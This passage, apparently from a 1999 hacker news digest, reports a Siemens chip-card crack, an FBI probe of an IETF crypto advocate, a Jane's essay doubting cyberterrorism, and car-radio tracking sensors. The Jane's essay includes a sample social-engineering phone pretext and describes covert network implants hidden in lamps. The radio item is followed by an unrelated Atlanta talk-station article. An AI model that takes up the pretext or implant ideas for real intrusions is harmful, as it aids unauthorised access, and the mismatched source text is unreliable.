      systems. With data dumps of the SLC44/66 chip and
      information explaining its design floating around the
      Internet anyone using the so-called Geldkarte system
      stands the risk of having money transferred without
      their knowing it. 

      The UK Register       
      http://www.theregister.co.uk/991201-000021.html
      
      Posted 01/12/99 4:19pm by Mike Magee

      Siemens German digital signature chip hacked

      Hackers have succeeded in cracking the Siemens digital signature card used in
      cashless payment systems and access control systems across the country. 
    
      The German Digital Signature was ratified by the European Union only a few days
      ago, after intense lobbying for a secure system for transactions. 
    
      The serious breach of security means that anyone using the so-called Geldkarte
      system stands the risk of having money transferred without their knowing it. 
    
      A dissasembled dump of the SLC44/66 chipcard CPU in TeX, along with two pages
      of German text explaining the design has been available on bulletin boards for some
      time, according to the source. 
    
      The dump is currently being re-engineered and commented, according to a source,
      and the knowledge gained has already been used to get hold of Telesec private keys.
      � 
      
      @HWA

15.0  IETF Members Under Investigation For Treason 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Some members of the Internet Engineering Task Force
      seem to be under investigation by the DOJ and FBI. The
      reason for the investigations seems to be the desire to
      include encryption and exclude back door capabilities in
      new protocols proposed by the IETF. The investigations
      are centered around treason charges. 

      NT Security
      http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=186&TB=news
      
      ZD Net      
      http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2398590,00.html
      
      Crypto Advocate Under FBI Investigation

      Tuesday, November 30, 1999 - We recently published a story
      regarding cryptography and IPv6, where somseone at the
      Department of Justice accused Scott Bradner, Internet Engineering
      Task Force (IETF) area coordinator, of an anti-social act by trying to
      get encryption inserted into the new protocol. Later, at an IETF
      meeting where votes were taken for IPv6 encryption inclusion, Fore
      System's Brian Rosen brazenly claimed that regardless of any
      encryption inclusion, Fore systems would proceed by including back
      doors into any included encryption technology. But the harrassment
      of the IETF doesn't stop there.

      Just how far will our federal government go towards controlling
      strong encryption? Apparently, very far. And this isn't a new effort
      by any means. We learned that William Allen Simpson, a
      Detroit-based computer consultant who was on the IETF staff, has
      been investigated by the federal government for treason charges.
      Simpson was the person that argued loudly for encryption to be
      included in the PPP protocol when it was still in design phases. That
      push landed Simpson in hot whatever with federal officials. Simpson
      learned through friends that he was under investigation for treason
      -- the FBI had been interviewing his friends and associates.

      Simpson obtained 54 pages of documents from the government under
      the Freedom of Information act, however the documents were
      heavily censored, including the bureau's basis for the investigation.
      According to a ZDTV report, Simpson did learn that the FBI had
      accused him of "challenging authority and laws that may impinge
      upon his activities."

      Wait a second! Isn't that part of what the Constitution is all
      about--the means to peacefully object to the laws of the land? I
      think so. And if that's true, then that certainly positions the FBI in a
      bad light since it would appear their actions are counter to the
      Consitutional rights. It not against the law to develop strong
      cryptography, but it is against the law to export that technology
      outside of proper governmental controls. The PPP protocol did not
      have encryption at the time--it was only a suggested inclusion--so
      why investigate a person for doing something completely legal?

      The IETF is an open public standards body that conducts its business
      in clear public view. They help stear standards that better ensure
      compatibility and interoperability. So why would the FBI investigate
      an IETF member just because that person suggested in a public
      meeting that strong encryption be included in a standard
      wide-spread protocol such as PPP?
      
      ZDnet;
      
      The New Crypto-Commies

      Could arguing for strong encryption be
      the next 'un-American activity' that
      justifies blacklists and secret FBI
      investigations?
      By Kevin Poulsen  November 24, 1999 

      Newly released documents show that the
      FBI closely monitored a key member of the
      standard-setting Internet Engineering
      Task Force (IETF) in 1992 and 1993, as
      he waged a doomed battle to inject
      crypto support into an emerging critical
      Internet standard. 

      William Allen Simpson, a Detroit-based
      computer consultant, was  on the IETF.
      The team was developing the "Point to Point
      Protocol" (PPP), designed to
      facilitate Internet access over dial-up
      modems. Simpson was making waves in
      the PPP Working Group by loudly arguing
      for inclusion of crypto support in the
      protocol, which today is used by the vast
      majority of home Internet users to go
      online. 

      In 1993, Simpson learned from a family
      member and colleagues that his efforts
      had drawn the FBI's interest. As he recalls
      it, the bureau was accusing him of a
      capital offense. 

      "Two guys came up to me at a meeting,"
      Simpson recalls. "They said, 'Bill, I was
      interviewed for a treason investigation by
      the FBI'." 

      "Bill was advocating encryption for
      authentication and for privacy in
      standardized Internet protocols," recalls
      Electronic Frontier Foundation cofounder
      John Gilmore, who heard of the
      investigation and suggested that Simpson
      request his FBI file under the Freedom of
      Information Act. 

      "He's kind of an iconoclast," Gilmore told
      me. "He follows his own way and
      sometimes it pisses people off, but it can
      be an advantage when you're faced with
      a Kafkaesque investigation by the
      government. He has the tenacity to stick
      with it until he finds the truth." 

      After six years of wrangling, Simpson
      finally pried 54 pages from the grasping
      hands of the domestic spies last
      Wednesday, only to find that the
      documents were heavily censored. 
      
      @HWA
      
16.0  Jane's Releases Cyberterrorism Report 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by turtlex 
      Jane's Information Group has released its much
      anticipated report on cyberterrorism. While the actual
      information in the article seems rudimentary and crude
      its conclusions about the possibility of a full out terrorist
      attack over the internet being extremely remote seem
      dead on. (Warning this is an extremely long and dry
      article that presents litte new information.) 

      Jane's Defense Weekly        
      http://jir.janes.com/sample/jir0525.html
      
      
      Cyberterrorism hype 
      
      With the 1990s propensity to dot.com everything that moves, 'hacking' and
      'cyberterrorism' have become subjects of intense media coverage. Almost daily,
      hitherto unknown security specialists warn of potential catastrophes: news that
      gets picked up by the media and crosses the globe with impunity. Johan J
      Ingles-le Nobel discussed the subject with programmers at Slashdot to profile
      so-called cyberterrorists and examine the viability of cyberwarfare. 
      
                      Cyberterrorism is a buzzword of 1999. Indeed, with the
                      remarkable growth of the Internet, hacking horror stories
                      have reached new heights of publicity, leading to a veritable
                      media frenzy. Yet careful examination of the issue reveals
                      much of the threat to be unsubstantiated rumour and media
                      exaggeration. The exaggeration is understandable, however
      - these technologies underpin our entire society, and what paper can resist
      printing a scoop revealing that banks are being blackmailed with threats of
      attacks on their computers, or that a military satellite has been hijacked by
      hackers? The idea that an anonymous teenager working alone from his bedroom
      can wreak electronic havoc on the far side of the world makes for good press. 
      
      What is a hacker? 
      
      Nothing gets a hacker's back up quicker than someone confusing a hacker with
      cracker. The term 'hacker' refers to an individual who programmes
      enthusiastically (even obsessively), enjoys programming or is especially good at
      programming; a 'cracker' is somebody who breaks into another's computer
      systems or digs into their code (to make a copy-protected programme run). Yet
      the boundaries have become somewhat blurred and the popular understanding of
      these terms is is quite wrong: ever since Hollywood produced 'Wargames', based
      on Kevin Mitnic's cracking activities (known as 'exploits'), the term 'hacking' has
      become synonymous with unauthorised access into restricted systems - which
      is 'cracking'. In today's world, such activity also includes the deliberate
      defacement of websites. Hackers are quick to point out that there is a code of
      hacker ethics that precludes any profit from the activity - the only motive is the
      activity itself - but they are not na�ve: realising the potential for misuse, they
      divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat'
      hackers (crackers). 
      
      According to hackers, 99% of cracking incidents can be blamed on so-called
      'script-kiddies'. These are usually young people who manage to acquire some
      'cracking tools' somewhere on the Internet and are keen try them. They choose a
      'cool' target (such as NASA, the Pentagon or the White House) and launch the
      tools. Older, more established 
      
      hackers see them as upstarts. Think of a kid walking down a corridor
      testing doorknobs; whilst they are more than capable of defacing
      websites such as that of the Central Intelligence Agency (CIA), their
      actions are seen as the equivalent of putting down a whoopie cushion
      on the chair of the UN Secretary General - juvenile, noisy and
      somewhat embarrassing, but ultimately without real effect. Says Mick
      Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about
      waking up to find graffiti (which is all it is) on one of my customer's sites." 
      
      However, even minor exploits illustrate one of the many paradoxes facing
      computer security. Specific websites, intended for the computer systems
      administrators and webmaster audiences, monitor the security vulnerabilities
      (bugs) in software that allow exploits to take place. The purpose of these
      websites is to distribute the corrective programming 'patches' that rectify the
      bugs. However, such sites are open to the public and are therefore the ideal
      place for crackers to discover new cracks. The result of this is that the vast
      majority of methods used by crackers to break into sites are known and there
      are patches available. This means that many believe the responsibility for
      security breaches lies not with the software supplier but with the company that
      owns and operates the system. Thus, if a company suffers a security breach,
      that highlights its own negligence or incompetence, which, along with the bad
      publicity associated with intrusions, makes it unsurprising that many companies
      are reluctant to publicise security breaches of their systems. This is especially
      true of the financial sector: there have been rumours for several years that banks
      have been blackmailed by hackers; confirmation has never been forthcoming. 
      
      Cracker profile 
      
      Global estimates vary, but a JIR extrapolation based on mid-1990 estimates by
      Bruce Sterling, author of The Hacker Crackdown: Law and Disorder on the
      Electronic Frontier, puts the total number of hackers at about 100,000, of which
      10,000 are dedicated and obsessed computer enthusiasts. A group of 250�1,000
      are in the so-called hacker '�lite', skilled enough to penetrate corporate systems
      and to unnerve corporate security. Given the huge number of people working as
      programmers for the online economy (the technical side of which requires much
      the same skills as those required by a hacker), the totals are sure to rise.
      According to the Center for Research on Electronic Commerce at the University
      of Texas, in 1998 the Internet economy was worth US$301.4 billion, providing 1.2
      million jobs in the USA alone. 
      
      The minimum skill-set needed to be a 'script-kiddy' is simply the ability to read
      English and follow directions. Indeed, much can be gleaned from books or
      documents and mailing lists online such as 'L0pht' bulletins and 'Phrack', whilst
      exploits can be learned from websites such as 'bugtraq', 'rootshell' or
      'packetstorm'. In fact, virus-writing and exploit code is common, and some is
      even automated. 
      
                However, to launch a sophisticated attack against a hardened
                target requires three to four years of practice in C, C++, Perl and
                Java (computer languages), general UNIX and NT systems
                administration (types of computer platform), LAN/WAN
                theory,remote access and common security protocols (network
                skills) and a lot of free time. On top of these technical nuts and
      bolts, there are certain skills that must be acquired within the cracker
      community. 
      
      'Hi, I'm Cheryl, I'm new in IT support. I'm having trouble with the modem bank.
      Can you check the modem to make sure it's turned on? Also, can I have the
      number to make sure I'm using the right one?' Of course, being a diligent and
      helpful worker, the recipient of such a call may be only too happy to help. 
      
      Tools of the trade 
      
      The cracker skillset is more common in highly educated individuals taught in the
      USA and Western Europe, although anyone with enough intelligence and time
      can pick it up without formal schooling. In fact, the skills are not at all rare or
      unusual, being the same as those required for an average, small or
      medium-sized company network system administrator: a position which
      commands among the lowest pay in the computer industry. The chances are
      that there is a university drop-out in your town with all of these prerequisites. That
      said, a list of qualifications does not fully explain their make-up, as the skillset is
      more to do with lifestyle than specific capabilities. Some people collect baseball
      cards; others analyse [computer network] protocols. 
      
      Attacks happen in various guises, from the simple and automated to the highly
      disguised and sophisticated. Crackers also write their own tools, which are
      disseminated in the underground. Certain system diagnostic tools and other
      cracker script tools can significantly automate the process of cracking less
      secure systems. At the low end of the sophistication scale there are activism
      websites, such as 'Floodnet', which hold web-page functionality that automates
      the process of reloading another website's pages in an attempt to make the
      system 'overheat' so that it ceases to work. This is a form of the most common
      exploit, Denial of Service (DoS), which comes in many forms. It is most common
      due to webmasters and web server administrators creating poorly written
      Common Gateway Interface (CGI) scripts (website programming). Exploiting the
      poorly written code is no great feat. In the words of one hacker: "Any punk kid
      could do this to any organisation without any trouble whatsoever." 
      
      Computer specialists suggest that, while annoying, such unsophisticated DoS
      attacks have a hidden danger: they could mask the use of specialist software
      custom-written by an �lite cracker amid the noise of the barrage of multiple
      automated attacks. Other tools exist that are designed by the hacker
      community, such as BO2000, which was specifically created to embarrass
      Microsoft's Windows NT security. In fact, the size of the black market in software
      (computer programmes) is enormous. Not only can exploit tools be procured in
      this manner, but they can easily be found online. 
      
      Social engineering 
      
      Social engineering is a term describing the process whereby crackers engineer a
      social situation that allows any potential cracker to obtain access to an
      otherwise closed network. This access could either be permanent (infiltrating an
      insider into the organisation who enables outside access), or temporary. Indeed,
      the scenario has a stunning simplicity about it: "Hi, I'm Cheryl. I'm new in IT
      support. I'm having trouble with the modem bank. Can you check the modem to
      make sure it's turned on? Also, can I have the number to make sure I'm using the
      right one?" Of course, being a diligent and helpful worker, the recipient of such a
      call is only too happy to help. 
      
      Most previous instances of information technology (IT) security violations have
      been attributable to 'inside jobs', which is why there has been significant
      controversy recently about US concerns hiring foreign programmers to rectify
      Y2K issues. 
      
      Having gained access, a cracker can either install code directly
      into the systems on the spot or add a transmitter device. To
      illustrate a scenario, after gaining access to a facility as cleaning
      staff, the perpetrator could put a small computer, itself connected
      to the main network, into the base of a lamp with an infra-red port
      (network connection) aimed out the window of an office or linked to
      a mobile phone. This gives an active presence on the target network and, more
      importantly, remote access to the device from anywhere within line of sight. In
      commercial environments, the security teams that search for bugs (bugs in the
      classical sense - 'listening devices') with receivers do not generally do infra-red
      profiles of a building; such a device will not transmit unless active, so sweeping
      for it is more difficult than trying to detect a bug that is monitoring audio. 
      
      Cellular modems also work, but are potentially detectable by radio-frequency
      sweeps. However, for corporate espionage it is an easy matter to pre-position
      several such systems and then take advantage of security vulnerabilities to gain
      permanent entry to the system. The phone company makes entry easy if the
      location is near a residential area as a receiving mobile phone just needs to be
      plugged into the network interface (telephone connection) of any house. Such
      attacks are not new, but the scale of machines necessary to realise them is
      down to 4in2 of PC board for an amateur willing to spend a little time shopping in
      the back of a technology magazine. "For less than US$1,000 you could build
      such systems and disguise them as appliances like lamps," said Paul Roberts,
      a US-based information security (INFOSEC) specialist. 
      
      Espionage on other computers by remotely monitoring the electro-magnetic (EM)
      signals they emit whilst in use is possible today, albeit expensive. Figures of
      $35,000 are quoted as estimates for a remote monitoring station in a van, for
      example, although the cost is coming down. "EM snooping technology might
      very well come into the reach of the advanced information security hobbyist or
      the determined criminal in the next five to 10 years," said Markus G Kuhn from
      the Computer Laboratory at Cambridge University in the UK. 
      
      Cracking: methods 
      
      Exploits come mainly in three species: DoS; destruction of information (erasing);
      and corruption of information (spoofing). 
      
      As indicated previously, DoS attacks take the form of overloading the processes
      of the computer hosting the website (the server), which then shuts itself down.
      Recently, a new form of such attacks has become prevalent - the 'distributed
      co-ordinated attack' - in which thousands of servers are used in unison. "It's
      possible to detect the attack, but it is very hard to block it using current
      software," said Thomas Longstaff, senior technical researcher for the Software
      Institute at Carnegie Mellon University. However, a co-ordinated attack to bring
      down a government's or a corporation's computer systems cannot be maintained
      long enough to be little more than a nuisance. Yet while only annoying at the
      moment, as interconnectivity increases and the importance of the online
      economy becomes manifest, such exploits will have serious financial
      implications. That said, recovery from such an attack tends to be fast. 
      
      Erasing is considered very difficult to conduct because any system worth
      attacking is also worth backing up. UK and US interbank transactions are
      backed up daily with multiple remote tapes, so any cracker wanting to destroy
      the interbank market will cause the loss of at most one day's transactions.
      However, this is not without consequence: consumer confidence in the banking
      system might drop to unprecedented levels were exploits to be publicised. 
      
      Viruses are a form of erasure most computer users are familiar with. Indeed, as a
      teenager Robert Morris accidentally launched a virus that shut down most of the
      Unix-based computers in the USA in the 1980s. Much can be said for judging the
      security implications of information technology by the fact that virus protection is
      now standard on any company computer. A good thing too, as 1999's 'Melissa
      virus' was the first of a new generation of Microsoft-targeted viruses that are
      self-replicating by sending themselves forward in an email entitled 'Important
      message from . . .' to the people listed in a person's Outlook Express email
      package without their knowledge. The 'Bubbleboy' virus promises to be worse, as
      you just have to receive it to be affected. Erasing attacks can be guarded against
      through multiple, remote (in both geography and network topology) back-ups,
      taken at sufficient frequency that the maximum possible loss is bearable for the
      system (the 'safe frequency'). Any system for which the safe frequency is too low
      for the defence to be practical (such as a power grid) tends be kept remote from
      networks, although this is not always the case. 
      
      Yet for every solution there is a problem. The effectiveness of back-ups can be
      circumvented by malicious programming that corrupts one random byte in the
      data; even though the back-ups look good, the data is bad. There is no way of
      telling unless the whole tape is recovered to find the one or two data files that
      have changed and examining them 'with a microscope'. The problems are obvious
      if someone had 10 weeks of back-ups, each with different bits of bad data, and
      all the back-ups were infected. There would be no way to know which data was
      good and which was bad. Indeed, if the cracker knows enough about the system
      he/she is attacking, recovery may be impossible. 
      
      Spoofing is much more difficult to guard against. This kind of attack comes in
      two guises: attempts to create phoney records or phoney messages in a system
      (such as creating false bank accounts); or attempts to create phoney
      instructions to the processing system, causing a failure of the system. This is as
      bad as an erasing attack. The easiest way to defend against non-destructive
      spoofing is again to use back-ups and to operate double-entry book-keeping,
      which traces every record to its creation and requires consistency between
      numerous (again, preferably topologically remote) sources. This multiplies the
      difficulty of an attack as the attacker has to break several systems instead of
      just one. By appearing to be a user, however, a cracker could manipulate data or
      corrupt the hardware by installing a virus, for example. While this would not be
      quite like a bomb going off, it could have much worse long-term repercussions. 
      
      The Internet Auditing Project 
      Host count: 36,431,374 
      Vulnerability count: 730,213 
      Vulnerable host count: 450,000 
      
      Destructive spoofing aimed at the processor rather than its records is a different
      matter. Causing the processor to execute phoney instructions could allow an
      attacker to erase records, transmit phoney messages and, potentially, cover
      his/her tracks well enough to escape consistency checks. This kind of attack is
      more difficult than any other - usually the only way to get another machine to
      execute rogue instructions is to exploit 'buffer overflows', overloading the
      temporary data buffer on computers. 
      
      Nightmare scenarios are based on such attacks. "We could wake one morning
      and find a city, or a sector of the country, or the whole country having an electric
      power problem, a transportation problem or a telecommunication problem
      because there was a surprise attack using information warfare,'' claims Richard
      Clarke, the US National Security Council adviser who heads counterterrorism
      efforts. Whilst alarmist, precedents do exist, as evidenced by Gail Thackaray,
      recognised as one of the premier cracker-catchers in the business: "One hacker
      shut down a Massachusetts airport, 911 emergency service and the air traffic
      control system while playing with the municipal phone network, and another
      hacker in Phoenix invaded the computer systems of one of the public energy
      utilities, attaining 'root' level privileges on the system controlling the gates to all
      the water canals from the Grand Canyon south." These examples involved
      individuals rather than organised groups, and none of them were politically
      motivated. 
      
      Cyberterrorism? 
      
      In warfare as well as in business, IT is the great equaliser. Its low financial barrier
      to entry relative to heavy industry allows even the poorest organisations an IT
      effectiveness equal (or nearly equal) to large corporations. 
      
                       The greatest advantage the covert warfare arms of major
                       nation-states (such as the CIA or Mossad) have over small
                       terrorist organisations is the financial wherewithal to
                       develop massive intelligence networks using the best
      equipment. IT levels the playing field in this regard. 
      
      Because sensitive military computers are required to be kept as far away from
      the Internet as possible, unless there was some major oversight or an incidence
      of social engineering, a military system cannot be directly attacked. However,
      there is always a weak link in the chain: for example, an army depends on
      Vendor A for supplies/ equipment, and Vendor A depends on parts from Vendor
      B, and so on. Somewhere in that chain is a vulnerability due to the massive
      networks, technological dependence and just-in-time ordering systems. Indeed,
      although direct attacks on critical infrastructure are unlikely, if on a network that
      has a link into it elsewhere, then one vulnerability is all it takes. Strikes in one
      automotive plant have effectively shut down large car makers. Most US
      automotive plants are also government contractors supplying vehicles and
      replacement parts to the military: an obvious target for planting viruses during
      war. 
      
      Some people collect baseball cards, others analyse protocols 
      
      Cyberterrorism is not only about damaging systems but also about intelligence
      gathering. The intense focus on 'shut-down-the-power-grid' scenarios and tight
      analogies with physically violent techniques ignore other more potentially
      effective uses of IT in terrorist warfare: intelligence-gathering, counter-intelligence
      and disinformation. 
      
      Disinformation is easily spread; rumours get picked up by the media, aided by
      the occasional anonymous e-mail. Cracking into a government server and posting
      a new web page looks impressive and generates publicity, but cracking into a
      government server and reading private email is much more valuable to terrorists.
      This gives cyberterrorists valuable details about the thought and operations of
      their adversaries, and can aid in planning conventional attacks. Furthermore, if
      terrorists can penetrate the security of an enemy organisation's computer
      networks, they do not need to do any damage to be militarily effective. Rather,
      they can quietly copy information to process at their leisure, without having to
      physically smuggle it out of secure facilities. False or misleading information can
      be planted in (or deleted from) databases, undermining the effectiveness of
      organisations relying on that information. In today's environment, authentication
      via strong encryption is still rare and IT makes forgery easy. Credentials can be
      forged to fool authorities or the media for purposes of disinformation or to
      enhance covert physical activities. 
      
      As pointed out by Clifford Stoll in The Cuckoo's Egg, automated 'data mining'
      techniques can be used to search for useful patterns in vast stores of insecure
      and seemingly unrelated data. A bank may assume its electronic fund transfer
      system is the most vital system to protect, but a terrorist may only want access
      to the financial records of persons or groups that are the bank's customers. This
      may not even involve destruction of data, as the pure information is often much
      more valuable than simply destroying random records. Reconnaissance attacks
      such as these are difficult to stop but extremely damaging. In the long-term
      banking scenario, the terrorist may simply choose to track sources of funding
      based on deposit records to harm the person or group who is the target. In a
      situation like this, going into the bank to destroy the information is only a
      temporary setback and will raise attention. Why destroy a valuable point of
      information gathering by doing something short-term like disrupting operations? 
      
      Nevertheless, for the terrorist, cracking might be used for
      more than just destroying data. Attacking an information
      system would be a good way to either distract the target
      or otherwise enable the terrorist to perform a physical
      attack. An example might be to crack into an airline and
      delete transport manifests to cover the transport of illegal
      materials. Had Shoko Asahara and the Aum Shinrikyo group been able to crack
      the Tokyo power system and stop the subways, trapping passengers on the
      trains, the number of casualties caused by their 1995 Sarin gas attack might
      have been significantly larger. If a determined group wanted to bring New York to
      its knees, what better way than to combine a physical bombing campaign with
      simultaneous IT attacks on the power grid, hospitals, emergency services and
      the media? 
      
      Turning to the larger picture, in warfare the party that runs out of funds first loses.
      Thus, the objective of warfare may not just be to inflict as much 
      
                       physical damage as possible, but instead be to maximise
                       financial damage. The Irish Republican Army (IRA) learnt
                       to use this concept very effectively in recent years,
                       sufficiently occupying the resources of the British
                       government through infrastructural attacks (as opposed to
      direct attacks against people). This suggests that, in the future, stock markets or
      other primary financial institutions might become high-profile targets and the
      most effective means of accomplishing a terrorist's goal. More damage would be
      accomplished by taking the New York Stock Exchange offline for a few days
      rather than actually bombing a building. That said, financial institutions are one of
      the few parties recognised in the hacker community for taking their security very
      seriously indeed. 
      
      Given the predominance of the IT-based industry and the familiarity of the Internet
      in the USA and Western Europe, the terrorist groups that fit the motive and
      mindset to use cracking could be closed religious or fanatical groups whose
      value systems are so out of sync with the mainstream that they feel threatened
      enough to take as much of the world with them as they 'go under'. That, together
      with 'lone gunmen' and activism campaigns - 'hacktavism' - are scenarios that
      appear to fit the profile. 
      
      A Pakistani Internet hacker known only as 'Dr Nuker', for example, has a
      message for Americans: he and a cybercohort, one 'Mr Sweet', have not yet
      begun to fight. The idea of Third World cyberpunks threatening the planet's sole
      superpower might seem unlikely - unless, of course, you run Internet sites at
      Lackland AFB or 86 other facilities their group that the 'Pakistan Hackerz Club'
      (PHC), has struck in the past five months. 
      
      The PHC's self-described founder and perhaps the world's most prolific Web
      cracker today, Dr Nuker admits he's a revolutionary, a 'cyberterrorist' with a
      cause: freedom for Indian-controlled Kashmir. Yet by penning anti-Indian
      missives on Internet sites run by the Naval Reserve Maintenance Facility in
      Ingleside, the Karachi Stock Exchange and even the Disney Guide, Dr Nuker not
      only has become a high-profile 'hacktivist' - a computer cracker with a political or
      social goal - but a wild card who hints he can wreak havoc far from home. 
      
      "We don't have any intentions to compromise any sort of military or governmental
      database, but in case there will be a cyber war with Pakistan, then we will sure
      prove our knowledge, ability and skills," he warned in an e-mail message. It may
      be no idle boast. 
      
      Today, employers, even those running critical infrastructure, are hard-pressed to
      not give employees Internet access; 401k retirement plans, health insurance
      plans and others are starting to mandate it. Most employees are on insecure,
      poorly administered, unreliable desktop operating systems: the recipe for serious
      electronic mayhem. 
      
      Beyond the hype 
      
      Critics maintain there is no such thing as cyberterrorism, and there is
      undoubtedly a lot of exaggeration in this field. If your system goes down, it is
      much more interesting to say it was the work of a foreign government rather than
      admit it was due to an American teenage 'script-kiddy' tinkering with a badly
      written CGI script. If the power goes out, people light a candle and wait for it to
      return, but do not feel terrified. If their mobile phones switch off, society does not
      instantly feel under attack. If someone cracks a web site and changes the
      content, terror does not stalk the streets. Some groups talk of taking down power
      grids; while that would help in conjunction with another type of attack, in itself it
      would be useless. Most grids suffer infrequent black-outs anyway that are not
      terrorist-related. In fact, terrorism campaigns using just computers are unlikely.
      The sheer size of programmes works against the attacker more than the
      defender. No one person can fully understand a programme comprising over a
      million lines of code, especially if he/she did not write it, and the defender has
      more people available. Critical programmes that run infrastructure functions, such
      as traffic lights, are usually custom-written, making them twice as difficult to
      attack. 
      
      Any system put together in the last few years will have been implemented with
      security in mind. Ironically, Y2K could prove to be a boon, as audits will give
      detailed reports on exactly what is in a system and this information can be used
      to boost security. 
      
      Most security-aware organisations do not put highly sensitive (such as military or
      corporate) data on servers that are accessible via the Internet and design their
      Internet servers to be disposable and easily reinstalled from compact disc (CD)
      or tape. These organisations also typically keep their servers in restricted-access
      areas. Most organisations with sensitive data also keep off-site back-ups.
      Write-once CDs are becoming very popular as they are inexpensive, compact
      and convenient to restore from. To cause serious and lasting damage, a terrorist
      would need to destroy or corrupt not only the contents of the servers, but also
      the off-site back-ups. 
      
      Reality bytes 
      
      In theory, cyberterrorism is very plausible, yet in reality it is difficult to conduct
      anything beyond simple 'script-kiddy' DoS attacks. Terrorists attempting to sway
      a populace by fear would therefore be less interested in such an attack unless
      they could carry out an extremely damaging one on a repeatable basis or unless
      they used it to augment the effects of a physical attack. 
      
      As things stand, while a terror attack using crackers is potentially highly
      destructive, the psychological impact of the disruption of services is still much
      lower than that of a direct physical attack. 
      
      Johan J Ingles-le Nobel is Deputy Editor of JIR, having previously obtained his
      Masters at St Andrews University. He gratefully thanks the contribution and
      advice of people at Slashdot.org. 
      
      
      @HWA

17.0  Car Radio Listening Habits Being Gathered 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      Think your safe from the prying eyes of the data
      collector when you're peacefully driving your car and
      listening to the radio? Think again. New technology
      being tested in Atlanta, Toronto, Los Angeles and
      Phoenix can remotely determine what radio station you
      are listening to in your car. Small shoebox-size
      electronic sensors posted on billboards and light poles
      can listen to the signal from the oscillator in the car
      radio, determine the frequency and log the information
      in a central database. This information is then made
      available to subscribing radio stations in real time to
      help in determining ratings numbers. (Even though this
      system does not collect demographic data, can't
      collect AM yet, and doesn't listen to homes or
      businesses, it is still scary as hell.) 
      
      The Atlanta Journal Constitution   
      http://www.accessatlanta.com/partners/ajc/newsatlanta/radio/index.html
      
      Getting with the program
      WCNN to debut as issue-oriented
      talk radio geared to Atlanta's
      black audience 
      
      We've got rock, rap,
      country, salsa and
      smooth jazz. But come
      April 3, Atlanta will have
      a new radio format -
      black news/talk. 
      
      That's when Midwestern
      Broadcasting, owner of
      adult R&B station Kiss
      104.7, will take over
      programming of
      WCNN/680 AM from Cox Radio and
      launch a 24-hour news/talk station aimed at
      Atlanta's African-American community. 
      
      According to Midwestern Vice President
      David Dickey, the station will emphasize
      local programs rather than syndicated
      shows, and focus on issues such as
      education, government, health care and the
      economy. 
      
      In the next few weeks, the company will
      announce the station's new name, unveil a
      logo and begin hiring on-air talent. 
      
      The takeover will end WCNN's lineup of
      news/talk shows, including Tom Hughes in
      the morning, the syndicated G. Gordon
      Liddy show at midday and Neal Boortz
      producer Royal Marshall's talk show in the
      afternoon. 
      
      "I don't think Neal [Boortz] or Dr. Laura
      [Schlessinger] are focused on the needs
      and issues of the average
      African-American listener," Dickey said,
      referring to popular programs on news/talk
      stations WSB-AM and WGST-AM/FM. 
      
      "If we are here to serve the black
      community, programming has to originate
      from that community. If you had to pick any
      city in America to support this effort, Atlanta
      is the city to do it." 
      
      According to Arbitron, the company that
      provides radio ratings, 769,000 of Atlanta's
      3 million radio listeners ages 12 and older
      are black. 
      
      As news of the venture trickled into the
      radio community Tuesday, many industry
      observers seemed to believe that a black
      news/talk station would be a savvy addition
      to Atlanta's increasingly competitive and
      lucrative radio market. 
      
      At 50,000 watts in the daytime and 10,000
      watts at night, WCNN is the
      second-strongest AM signal in town,
      behind WSB. 
      
      "Oooh, that's smart," said Star 94 general
      manager Mark Kanov upon hearing the
      news. "A market like Atlanta would certainly
      have a strong core for a station like that. On
      the surface, it seems like it would have a
      very strong appeal." 
      
      "It's what I would do if I owned the station,"
      said Andrew Saltzman, general manager of
      Sportstalk 790/The Zone. "Talk radio is a
      booming format, and that's a
      [demographic] that's not truly being catered
      to. Why shouldn't the urban community have
      full-service talk radio?" 
      
      Black news/talk is not a new idea. The
      format has been successfully adopted by
      WOL in Washington and WLIB in New
      York. But because there was usually only
      one per community, urban radio stations
      have not broken into niche formats as
      quickly as stations geared to white
      audiences. 
      
      For example, V-103, Atlanta's top-rated
      urban station, was the only major FM
      station catering to the African-American
      audience until 1992, when Kiss 104.7
      signed on the air. V-103 morning host
      Frank Ski explained how such exclusivity
      affected the listening habits and
      expectations of the black radio audience. 
      
      "For a long time, the lack of radio stations
      available to minorities meant we didn't
      have a second or third choice when it came
      to radio," Ski said. "That made the black
      community begin to like a whole package
      of things [on one station]. 
      
      We want to hear music, hear something
      funny and be informed. Black talk can be
      good for the market if it's done right. The
      difficulty is that because we haven't really
      had it, there's not a lot of good, available
      talent to do it. They will be competing with
      the white news-talk stations, so they really
      need to have their game together." 
      
      Midwestern Broadcasting, which is owned
      by the Dickey family, has specialized in
      creating formats for the African-American
      community, such as the adult R&B of Kiss
      104.7 and the contemporary gospel of
      Glory 1340 AM. However, some have
      raised questions as to whether white
      management is politically or socially
      motivated. 
      
      Ryan Cameron, morning man at rap station
      Hot 97.5, wonders whether Midwestern will
      take the new station into the community as
      much as he or Ski do with their shows. 
      
      "Anything that's going to make the market
      more interesting is definitely a plus,"
      Cameron said. "It's great to raise issues
      and talk, but how visible will they be? 
      
      It's not like they got new owners. I'll be
      curious to see how much involvement there
      will be in the community other than
      monetary." 
      
      Dickey doesn't believe that a black
      news/talk station with white ownership will
      cripple its chances of success. 
      
      "Race has nothing to do with it, it just
      makes good economic sense," he said. 
      
      "Sure, we're trying to make a buck off this.
      But more important, we've been able to
      provide a choice for African American
      listeners in Atlanta. 
      
      As a broadcaster, it's my responsibility to
      research the market and find the
      opportunties that are there. We have two
      well established radio stations in Kiss and
      Glory, and this is an extension of that niche.
      
      I don't care if you're white, black, Chinese,
      male, famale, young or old, it doesn't make
      sense to go up against established
      stations like WSB or WGST. [A black
      news/talk station] complements our
      package. 
      
      We can cross-promote each station with
      the other two. We can utilitze people who
      appear on one and put them on the other." 
      
      The transaction does not involve the sale of
      680 AM, rather a switch in who is calling
      the shots about what is on the air. For five
      years, Midwestern Broadcasting, which
